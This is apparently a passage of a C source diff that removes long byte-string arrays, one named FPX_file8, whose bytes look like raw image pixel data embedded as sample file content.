-"\xe1\xde\xdd\xdc\xd4\xc9\xe5\xe8\xef\xe5\xe8\xf0\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe5\xe7\xed\xe6\xe7\xec\xe7\xe6\xe7\xf2\xf2\xf1\xfd\xfd\xfd" -"\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf8" -"\xf4\xed\xf0\xe5\xd6\xf1\xe7\xd9\xfc\xfb\xf9\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf6\xf3\xe7\xde\xd2" -"\xea\xed\xf2\xe6\xe8\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe5\xe6\xec\xe3\xe3\xe6\xde\xd8\xd1\xe5\xe8" -"\xf0\xe3\xe3\xe5\xd6\xc3\xa8\xe0\xdc\xd8\xe5\xe8\xef\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe1\xdf\xde\xd3\xbb\x9b\xe6\xe9\xf1\xe6\xe9\xf1\xe5" -"\xe8\xf0\xd2\xb9\x97\xe5\xea\xf2\xe6\xe9\xf1\xe4\xe5\xea\xdc\xd2" -"\xc6\xd3\xba\x99\xe3\xe3\xe6\xe6\xe9\xf1\xe4\xe5\xea\xe0\xde\xdc" -"\xe3\xe5\xe8\xe3\xe5\xe9\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xf0\xe5\xe8\xef\xe5\xe7" -"\xeb\xec\xea\xe8\xf2\xf1\xef\xf7\xf5\xf2\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfd\xfb\xf9\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff" -"\xfc\xfb\xfa\xec\xeb\xeb\xe7\xe8\xeb\xe6\xe8\xee\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xed\xe0\xdc\xd9\xe3\xe5" -"\xe8\xe4\xe6\xeb\xe3\xe3\xe6\xd2\xbb\x9b\xde\xd8\xd0\xe5\xe8\xef" -"\xe6\xe9\xf1\xe3\xe4\xe8\xd4\xbf\xa3\xe5\xe9\xf1\xe6\xe9\xf1\xe3" -"\xe4\xe7\xd9\xca\xb7\xe6\xe9\xf1\xe6\xe9\xf1\xd8\xc7\xb1\xd3\xbb" -"\x9a\xdc\xd2\xc5\xe3\xe2\xe3\xe1\xde\xdc\xe1\xe0\xe0\xde\xd8\xcf" -"\xe0\xdd\xd9\xe0\xdd\xda\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe5" -"\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xee\xe8\xe9\xeb\xec\xeb\xeb\xf2\xf1" 
-"\xf0\xfc\xfb\xfa\xfe\xfd\xfd\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xfb\xfa\xf0\xee\xeb\xea" -"\xea\xeb\xe6\xe7\xea\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe4\xe6" -"\xeb\xe1\xde\xdc\xe2\xe2\xe4\xe3\xe2\xe4\xdb\xcf\xc0\xd2\xba\x99" -"\xe4\xe6\xec\xe5\xe9\xf0\xda\xcd\xbb\xe4\xe7\xed\xe3\xe2\xe4\xd4" -"\xbf\xa0\xe4\xe5\xe9\xe1\xe0\xdf\xca\xa4\x70\xe1\xe0\xe0\xe0\xdc" -"\xd8\xdd\xd6\xcd\xe4\xe5\xeb\xe5\xe7\xef\xe3\xe3\xe7\xc7\xa0\x6a" -"\xc2\x91\x4f\xc8\xa4\x72\xcc\xd5\xea\xc3\xcf\xee\xce\xd8\xf1\xd2" -"\xd8\xe9\xd4\xdd\xf0\xdd\xe4\xf5\xe2\xe9\xfa\xf0\xf4\xfc\xf4\xf6" -"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfd\xf9" 
-"\xf7\xf4\xf3\xf2\xf0\xe8\xe9\xec\xe5\xe7\xed\xe5\xe8\xf0\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe4\xe7\xed\xde\xd8\xd1\xe4\xe5\xe9\xdc\xd3\xc7" -"\xda\xce\xbd\xe4\xe5\xea\xdd\xd4\xca\xe3\xe3\xe5\xdb\xd0\xc1\xd4" -"\xbd\x9e\xd8\xc9\xb4\xca\xa3\x6d\xdf\xdd\xd9\xe2\xe1\xe2\xe1\xe0" -"\xe0\xe2\xe1\xe2\xe6\xe9\xf1\xe6\xe9\xf1\xe1\xe0\xe0\xcd\xbd\xa6" -"\xd1\xc0\xa8\xce\xba\x9e\xb2\xc0\xe2\x9b\xb3\xec\xbb\xcc\xf4\xb4" -"\xc7\xf3\xb2\xc6\xf5\xb0\xc5\xf5\xc4\xd4\xf7\xd8\xe2\xf9\xde\xe6" -"\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfe\xfe\xfd\xf6\xf5\xf3\xee\xed\xec\xe8\xe9\xeb\xe5\xe8" -"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe2\xe2\xe4\xe2\xe1\xe2\xdf\xdb\xd7" -"\xd3\xbb\x9a\xd8\xc9\xb5\xde\xd7\xcf\xdd\xd5\xcb\xd3\xbc\x9d\xd6" -"\xc3\xa8\xd2\xbb\x99\xe2\xe2\xe5\xe0\xde\xdb\xe3\xe3\xe6\xe5\xe8" -"\xf0\xe6\xe9\xf1\xe5\xe8\xf0\xe5\xe8\xf0\xe1\xdf\xde\xdc\xe2\xe7" -"\xe8\xee\xf4\xdc\xd9\xd4\xd8\xde\xee\xd1\xdd\xf7\xe5\xec\xfb\xdc" -"\xe5\xfa\xda\xe4\xf9\xd6\xe1\xf9\xe9\xee\xfb\xec\xf1\xfc\xee\xf2" -"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf8" -"\xf6\xf4\xf3\xf0\xeb\xe8\xe5\xe5\xe6\xeb\xe5\xe8\xf0\xe4\xe6\xec" -"\xe2\xe6\xed\xd9\xd6\xd1\xd1\xc5\xb0\xce\xc0\xa7\xcd\xbc\xa0\xd3" -"\xcb\xbc\xdd\xdc\xdc\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xed\xe6\xe7" -"\xeb\xe9\xe8\xe9\xf3\xf1\xf0\xf8\xf7\xf5\xf8\xf4\xee\xd8\xc5\xaa" -"\xd9\xc7\xad\xd9\xc4\xa8\xdd\xe4\xf6\xd4\xdf\xf8\xd7\xe2\xf9\xd4" -"\xe0\xf9\xd8\xe3\xf9\xd8\xe3\xf9\xee\xf3\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xfe\xfd\xfd\xfc\xfb\xf9\xeb\xea\xe9\xe6\xe9\xf0\xe6\xe9\xf1" -"\xae\xc7\xd6\x87\xb8\xd3\x81\xb7\xd3\x81\xb5\xd1\x81\xb6\xd1\x82" -"\xb7\xd5\x9f\xbe\xce\xdd\xdf\xe2\xe6\xe9\xf1\xe1\xdf\xde\xef\xee" 
-"\xed\xee\xee\xf0\xe2\xe9\xf9\xe1\xe9\xfb\xea\xef\xfa\xdc\xdd\xe5" -"\xdf\xdf\xe4\xef\xeb\xe8\xf0\xf4\xfc\xfd\xfe\xfe\xfe\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xfb\xfb" -"\xfc\xfd\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfd\xfd\xfd\xfb" -"\xfb\xfb\xfd\xfd\xfd\xfd\xfd\xfd\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xfa\xfa\xfb\xfb\xfb\xe7" -"\xe7\xe7\xdb\xdc\xdc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xea\xe5\xe7\xeb\xe6\xe9\xf1" -"\x61\xae\xda\x37\xaa\xef\x35\xaa\xf0\x35\xa9\xee\x35\xa9\xef\x35" -"\xaa\xf0\x52\xa7\xd6\xbd\xc0\xbf\xb6\xd5\xf1\xc6\xd4\xe0\xd8\xe7" -"\xf3\xdd\xe8\xfa\xab\xc1\xf4\xa7\xbe\xf4\xac\xc2\xf5\x99\xb3\xf4" -"\xa9\xc0\xf4\xd9\xe3\xf9\xc5\xd5\xf8\xf9\xfb\xfe\xff\xff\xff\xfd" -"\xfd\xfd\xf9\xfa\xfa\xfc\xfc\xfc\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xe6\xe6\xe6\xe7\xe7\xe7\xf7\xf7\xf7\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfb\xfb\xfc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\xf1\xf2\xf2\xf2" -"\xf2\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xca\xca\xca\xd2\xd2\xd3\xc7\xc8\xc9\xb3" 
-"\xb4\xb3\xb6\xb7\xb7\xc0\xc1\xc1\xe3\xe3\xe3\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xdd\xdd\xdd\xc3\xc3\xc3\xb4\xb5\xb5\xbf" -"\xc0\xc1\xb8\xb9\xba\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf0\xee\xeb\xe5\xe7\xeb\xe6\xe9\xf1" -"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x30\x7f\xad\x2f\x8d\xc3\x32" -"\xaa\xf2\x43\xa9\xe5\xb5\xc2\xc9\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7" -"\xf7\xfc\xfd\xfe\xf7\xf9\xfe\xf8\xf9\xfd\xf8\xfa\xfd\xf8\xfa\xfe" -"\xf8\xfa\xfe\xf4\xf7\xfd\xf1\xf5\xfc\xfd\xfd\xfe\xff\xff\xff\xcf" -"\xd0\xd0\xbf\xc0\xc0\xa5\xa7\xa8\xb6\xb7\xb7\xec\xec\xec\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xc6\xc6\xc7\xa8\xa9\xa8\xbf\xbf\xc0\xfd\xfd\xfd\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf5\xf5\xf5\xf1\xf1\xf2\xf2\xf2\xf2" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xe2\xe2\xe2\xd6\xd7\xd7\xdc\xdc\xdd\xd4" -"\xd5\xd5\xcd\xce\xce\xcb\xcc\xcc\xf1\xf1\xf1\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xef\xef\xf0\xd5\xd5\xd6\xd1\xd1\xd2\xd4" -"\xd4\xd5\xcd\xce\xce\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xf0\xef\xe6\xe8\xed\xe6\xe9\xf1" -"\x51\xad\xe2\x32\xad\xf7\x32\xad\xf7\x31\x7d\xab\x30\x91\xcb\x32" -"\xa8\xef\x43\xa9\xe5\xb5\xc7\xd2\xe6\xe9\xf1\xdf\xdd\xdb\xf6\xf7" -"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xe5" -"\xe5\xe5\xc9\xca\xcb\xbd\xbe\xbf\xd3\xd4\xd5\xf5\xf5\xf6\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xd6\xd6\xd7\xc7\xc7\xc7\xd1\xd1\xd1\xfe\xfe\xfe\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfd\xfd\xfd\xfc\xfc\xfc\xfd\xfd\xfd\xf4" -"\xec\xe2\xf9\xf7\xf5\xfb\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfa\xfa\xfb\xfb\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf1\xee\xec\xe5\xe7\xec\xe6\xe9\xf1" -"\x5b\xad\xdc\x33\xab\xf3\x32\xab\xf4\x32\x9b\xdb\x32\xa7\xed\x32" -"\xab\xf3\x4a\xa9\xe0\xba\xc4\xc8\xe6\xe9\xf1\xdf\xdd\xda\xf6\xf7" -"\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc" -"\xfb\xfa\xf1\xee\xe9\xee\xec\xeb\xfc\xfc\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xeb\xe7\xe1\xf4\xf2\xf0\xfb\xfb\xfb\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf8\xf2\xea\xf0\xe3\xd2\xf3\xec\xe1" -"\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc" -"\xfa\xf7\xec\xdb\xc4\xd7\xb4\x84\xf6\xf0\xe8\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xd7" -"\xb3\x83\xe7\xd2\xb5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xea\xe5\xe8\xef\xe6\xe9\xf1" -"\xe5\xe8\xef\xe4\xe7\xed\xe4\xe5\xea\xe4\xe7\xec\xe4\xe5\xe9\xe4" -"\xe6\xec\xe5\xe7\xee\xe6\xe9\xf1\xe6\xe9\xf1\xd6\xcd\xbe\xfd\xfd" -"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfa\xdd" -"\xbe\x94\xf9\xf4\xee\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe9\xd8\xb4\x82" -"\xd4\xaf\x7c\xfb\xf8\xf4\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xea\xfa\xf7" -"\xf3\xf6\xee\xe3\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf3\xed" -"\xe2\xcb\xac\xfd\xfc\xfb\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xd4\xab\x75\xda\xb8\x88\xed\xde" -"\xc9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xd7\xb2\x7f\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xef\xeb\xec\xed\xf1\xe7\xe5\xe3" -"\xe6\xe4\xe1\xed\xee\xf3\xe7\xe5\xe2\xe4\xdd\xd6\xe9\xe9\xe9\xeb" -"\xec\xee\xed\xee\xf1\xe4\xe0\xda\xee\xf0\xf5\xfa\xfb\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xef\xe1\xcd\xce\x9f\x5f\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfc\xfa\xf7\xed\xdd\xc8\xd2\xa9\x72\xf3\xea\xdc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xed\xdf\xcb\xfa\xf7\xf2\xf7\xf2\xea\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe" -"\xfd\xfd\xfc\xfd\xfc\xfb\xf3\xe9\xdc\xfa\xf7\xf3\xf6\xf0\xe8\xfe" -"\xfd\xfc\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xf0\xe4\xd3\xe5\xce" -"\xaf\xe7\xd2\xb5\xf2\xe8\xd9\xfb\xf9\xf5\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -; - -unsigned char FPX_file8[] = -"\xfe\xfe\xf8\xf2\xea\xe4\xcc\xab\xf6\xef\xe5\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9" -"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xd2\xb6\xfa\xf8\xf5\xfc" -"\xfb\xfa\xfc\xfb\xfa\xfe\xfe\xfe\xff\xff\xff\xfe\xfe\xfd\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfd\xfc\xfb\xe4\xcc\xab\xe3\xca\xa8\xf3\xe8\xda\xfe" -"\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfb\xf8" -"\xf3\xe7\xd1\xb4\xe1\xc7\xa3\xe6\xd0\xb1\xfa\xf7\xf2\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc\xfa\xf8\xf7\xf1\xe9\xf0" -"\xe5\xd6\xf9\xf4\xee\xf7\xf1\xe9\xfd\xfb\xf9\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xfc" 